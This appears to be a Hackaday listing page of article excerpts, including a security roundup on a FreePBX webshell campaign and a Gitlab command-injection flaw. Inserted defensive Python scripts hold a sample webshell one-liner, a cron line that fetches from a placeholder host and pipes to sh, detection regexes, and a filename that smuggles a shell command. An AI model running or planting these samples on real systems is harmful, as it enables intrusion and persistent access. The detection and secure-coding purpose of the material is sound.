This Week In Security: In Mudge We Trust, Don’t Trust That App Browser, And Firefox At Pwn2Own

There’s yet another brouhaha forming over Twitter, but this time around it’s a security researcher making noise instead of an eccentric billionaire. [Peiter Zatko] worked as Twitter’s security chief for just over a year, from November 2020 through January 2022. You may know Zatko better as [Mudge], a renowned security researcher who literally wrote the book on buffer overflows. He was a member of L0pht Heavy Industries, worked at DARPA and Google, and was brought on at Twitter in response to the July 2020 hack that saw many brand accounts running Bitcoin scams.

Mudge was terminated at Twitter in January 2022, and it seems he immediately started putting together a whistleblower complaint. You can access his complaint packet on archive.org, with whistleblower_disclosure.pdf (PDF, and mirror) being the primary document. There are some interesting tidbits in here, like the real answer to how many spam bots are on Twitter: “We don’t really know.” The very public claim that “…<5% of reported mDAU for the quarter are spam accounts” is a bit of a handwave, as the monetizable Daily Active Users count is essentially defined as active accounts that are not bots. Perhaps Mr. Musk has a more legitimate complaint than was previously thought.

I3C — No Typo — Wants To Be Your Serial Bus

Remember old hard drives with their giant ribbon cables? They went serial and now the power cables are way thicker than the data cables. We’ve seen the same thing in embedded devices. Talking between chips these days tends to use I2C or SPI or some variation of these to send and receive data over a handful of pins. But now there is I3C, a relatively new industry standard that is getting a bit of traction.

I2C and SPI are mature but they do have problems. I2C can be relatively slow and SPI usually requires extra pins for each device. Besides that, there is poor support for adding and removing devices dynamically or discovering devices automatically.

I3C, created by the MIPI Alliance, aims to fix these problems. It uses the usual two wires, SCL for the clock and SDA for data. One device acts as a controller; other devices can be targets or secondary controllers. It is also backward compatible with I2C target devices. Depending on the implementation, it can be quite fast: the raw data rate is 12.5 Mbps, and line coding techniques push that to around 33 Mbps.


2022 Hackaday Supercon Tickets On Sale Now

Did I tell you about the time that [Spetku] turned the schwag bottle into a Jacob’s Ladder?
Supercon Tickets go on sale right now! And the true-believer tickets usually sell out fast, so if you’re as excited about the thought of a real-life Supercon as we are, get yours now for a healthy discount.

We might be biased, but Supercon is our favorite conference of the year. Smaller than most and hardware-focused, you really can’t beat the signal/noise ratio of the crowd in attendance and the talks on the stage. People bring their projects, their great ideas, and their big dreams with them. And we have a cool badge to boot. It’s Hackaday, but in real life. And you should join us!

The conference starts on Friday Nov. 4th with registration, a mellow afternoon of badge-hacking, and a party to kick things off right. Saturday and Sunday are the main show, with a hacker village in the alley, workshops aplenty, and of course all of the talks. It’s only a weekend, but it’s one you’ll keep going back to in your mind for the whole year.

The Nitty Gritty Details

One hundred (100) True-believer Tickets are on sale now for $128 apiece, until they’re gone or until Aug. 29th. We call them True-believer Tickets because we haven’t even finished the call for proposals yet, much less selected the talks, but trust us, it’s going to be a good slate. (In past years, the True-believer tickets have sold out in as little as a day, so don’t sleep on this!) After that, regular admission is $256.

Of course, there’s always a back door if you want to sneak in for free. In our opinion, the coolest way to attend a conference is to give a talk, and you’ll get a complimentary ticket to boot! And even if you don’t get selected, we’ll give everyone who submits a serious talk proposal a ticket at the discounted price, so don’t hesitate. Volunteers also get in free, and we’ll be putting out the call on Aug 29th.

No matter how you get yourself a ticket, get one, and get to Supercon. We’re excited to see you in person again!

An illuminated MCH2022 sign composed of large LED letters

Mutually Crafted Happiness: How MCH2022 Happened

Just a few days ago, MCH2022, a six-day-long hacker camp in the Netherlands, concluded – bringing about three thousand hackers together to hang out. It was my first trip to a large hacker camp like this, as I’ve only been to smaller ones, and this story is coming from someone who’s only now encountering the complexity and intricacy of one. This is the story of how it’s run on the inside.

MCH2022 is the successor of a hacker camp series in the Netherlands – you might’ve heard of the previous one, SHA, organized in 2017. The “MCH” part officially stands for May Contain Hackers – and those, it absolutely did contain. An event for hackers of all kinds to rest, meet each other, and hang out – long overdue, and in fact, delayed for a year due to the ever-present pandemic. This wasn’t a conference-like event where you’d expect a schedule, catering and entertainment – a lot of what made MCH cool was each hacker’s unique input.

Just like many other camps similar to this, it was a volunteer-organized event – there’s no company standing behind it, save for a few sponsors with no influence on decision-making; it’s an event by hackers, for hackers. The Netherlands has a healthy culture of hackerspaces with plenty of cooperation between them, and when that cooperation forms a self-organized network of volunteers, it works magic.

This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the CVE is triggered by a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes or visit a web page. Because of that use case, any FreePBX deployment with this feature enabled that supports VoIP phones connecting from outside the network would need these ports open. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.
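A fine-toothed comb, in practice, starts with the three persistence tricks the report names: extra accounts, cron entries, and obfuscated webshells. The script below is an added example, not part of the article and not a FreePBX or Sangoma tool; its /etc/passwd lines, crontab lines and PHP file bodies are constructed samples, the placeholder URL is invented, and the patterns it looks for (a second UID-0 account, a cron job that fetches and pipes to a shell, PHP that decodes and evals) are generic heuristics rather than the campaign’s actual indicators.

```python
"""Triage checks for the persistence techniques described above.

Added example; not the article's or FreePBX's code. All sample data
below is constructed so the script runs offline.
"""
import re

# Constructed /etc/passwd: a second UID-0 account besides root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:991:988:Asterisk user:/var/lib/asterisk:/sbin/nologin
sysadmin:x:0:0::/home/sysadmin:/bin/bash
"""

# Constructed crontab: a legitimate backup plus a fetch-and-run entry.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/sbin/fwconsole backup --id=1
*/5 * * * * curl -s http://EXAMPLE-PLACEHOLDER/x | sh
"""

# Constructed PHP sources keyed by path: one benign, one decode-and-eval.
SAMPLE_PHP = {
    "/var/www/html/index.php": "<?php include 'config.php'; echo 'ok';",
    "/var/www/html/admin/.s.php": "<?php eval(gzinflate(base64_decode($_POST['c'])));",
}


def extra_root_accounts(passwd_text):
    """Usernames with UID 0 other than 'root' (field 3 of each passwd line)."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


# Remote fetch piped straight into a shell, or inline base64 decoding.
CRON_SUSPECT = re.compile(r"(curl|wget)\b.*\|\s*(sh|bash)\b|base64\s+-d", re.I)


def suspicious_cron_lines(crontab_text):
    """Cron lines whose command fetches remote content and executes it."""
    return [line for line in crontab_text.splitlines() if CRON_SUSPECT.search(line)]


# eval() fed by a decoder/inflater: the classic obfuscated-webshell shape.
PHP_SUSPECT = re.compile(
    r"\beval\s*\(.*\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.I | re.S,
)


def suspicious_php_files(files):
    """Paths whose PHP source evals decoded or inflated data."""
    return sorted(path for path, src in files.items() if PHP_SUSPECT.search(src))


def triage(passwd_text, crontab_text, php_files):
    """Run all three checks and return the findings as one dict."""
    return {
        "extra_root_accounts": extra_root_accounts(passwd_text),
        "suspicious_cron": suspicious_cron_lines(crontab_text),
        "suspicious_php": suspicious_php_files(php_files),
    }


if __name__ == "__main__":
    for check, findings in triage(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_PHP).items():
        print(f"{check}: {findings}")
```

On a real host you would feed it the actual /etc/passwd, every user’s crontab plus /etc/cron.d, and the contents of the web root; a clean result does not prove the box is clean, since the report stresses how varied the obfuscation is, but a hit on any of the three is reason to rebuild rather than clean.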

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping any of the checks intended to prevent it, you can trivially insert shell commands that will be run on the underlying server. Avoiding the traps is a big part of the work to actually make this into a real PoC. Read the post for full details on the debugging journey.
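The root cause here is a filename becoming part of shell syntax. The snippet below is an added example, not Gitlab’s code (Gitlab is Ruby; Python is used here only to show the pattern): it puts the vulnerable shape next to the two defensive habits that close the class of bug, a strict allowlist on the name and an argv list that is never re-parsed by a shell. The function names, the tar flags and the sample archive names are assumptions.

```python
"""Vulnerable command-string concatenation versus validated argv construction.

Added example, not the project's code. Names, flags and samples are assumed.
"""
import re
import shlex
import subprocess

# Characters a POSIX shell would interpret if they appear unquoted in a command.
SHELL_META = set(";|&$`<>()\n\r\t \"'\\*?~#!")


def unsafe_command(archive_name):
    """The vulnerable shape: the name is glued into a string a shell will parse.

    Kept only to illustrate the pattern; nothing in this file executes it.
    """
    return "tar -xzf " + archive_name + " -C /tmp/import"


def shell_metachars(archive_name):
    """Which shell metacharacters a name would smuggle into unsafe_command()."""
    return set(archive_name) & SHELL_META


def quoted_command(archive_name):
    """If a shell string is unavoidable, shlex.quote makes the name one word."""
    return "tar -xzf " + shlex.quote(archive_name) + " -C /tmp/import"


# Allowlist: leading alphanumeric (so it can never look like an option),
# a bounded body of safe characters, and the exact extension we expect.
ARCHIVE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,99}\.tar\.gz")


def validate_archive_name(name):
    """Return the name if it is a plain, well-formed basename; else ValueError."""
    if not isinstance(name, str) or not ARCHIVE_NAME.fullmatch(name):
        raise ValueError("rejected archive name")
    if ".." in name:  # defence in depth; the regex already forbids '/'
        raise ValueError("rejected archive name")
    return name


def rejects(name):
    """True when validate_archive_name refuses the name."""
    try:
        validate_archive_name(name)
    except ValueError:
        return True
    return False


def build_argv(name, dest):
    """argv list: the validated name is one argument, never shell-parsed."""
    return ["tar", "-xzf", validate_archive_name(name), "-C", dest]


def run_import(name, dest):
    """Extract with an argv list (shell=False is the default) and fail loudly."""
    return subprocess.run(build_argv(name, dest), check=True)


if __name__ == "__main__":
    good, bad = "proj-v1.2.tar.gz", "a;id.tar.gz"
    print("unsafe string for bad name:", unsafe_command(bad))
    print("metachars smuggled in:", shell_metachars(bad))
    print("quoted form:", quoted_command(bad))
    print("argv for good name:", build_argv(good, "/tmp/import"))
    print("bad name rejected:", rejects(bad))
```

The allowlist does the real work: the checks the post describes as traps are denylists, and a denylist is what the PoC work consists of getting around. Rejecting anything that is not a short, alphanumeric-leading basename with the expected extension leaves nothing to bypass, and passing the result as a single argv element means the shell never sees it at all.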

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings and make the setting change. Finally!

The 2022 Hackaday Supercon Is On! And The Call For Proposals Is Open

After two years in remote mode, we’re very excited to announce that this year’s Hackaday Supercon will be coming back, live! Join us Nov. 4th, 5th, and 6th in sunny Pasadena, CA for three days of hacks, talks, and socializing with the Hackaday community. And we’d love to see and hear in person what you’ve been up to for the last two years – so start brainstorming what you’re going to talk about now and fill out the call for proposals.

Supercon is On!

We’ll be starting off on Friday Nov. 4th with early-bird registration, a mellow afternoon of badge-hacking and workshops, and a party to kick off the con. Saturday and Sunday will be the full enchilada: two tracks of talks, hacking stations and food set up in the alley, and workshops aplenty. (Just thinking about hacking in the alley and sharing tacos afterward again brings a tear of joy to my eye.) We’ll close up Sunday night with the 2022 Hackaday Prize Awards and a chance to demo the weekend’s badge hacking on stage.

If you haven’t ever been to a Supercon before, it’s Hackaday in real life. People bring hacks to show and share, projects to work on, and ideas that are too big to fit in the overhead compartment anyway. The crowd is awesome. There are seasoned pros, famous YouTubers, and brand-new hackers to boot. Yet it’s not overwhelming – Supercon is too big to fit in your living room, but it’s nonetheless cozy. The folks in attendance are all fantastic and you’ll stumble into the most awesome conversations.

It’s a weekend you don’t want to miss, so start figuring out how you’re going to get to Pasadena now.

We’ll be putting tickets on sale soon, and while we can’t see into the future, they have sold out every year, so keep your eyes on Hackaday to get yours. And of course, speakers don’t need no stinking tickets.

This Week In Security: Retbleed, Post-Quantum, Python-atomicwrites, And The Mysterious Cuteboi

Yet another entry in the “why we can’t have nice things” category, Retbleed was announced this week as yet another speculative execution vulnerability. This one is mitigated in hardware for AMD’s Zen 3 and Intel Generation 9 and later. For earlier parts, the software mitigation carries a quite painful performance hit. What exactly makes this different from previous weaknesses, and why didn’t the previous mitigations cover this problem?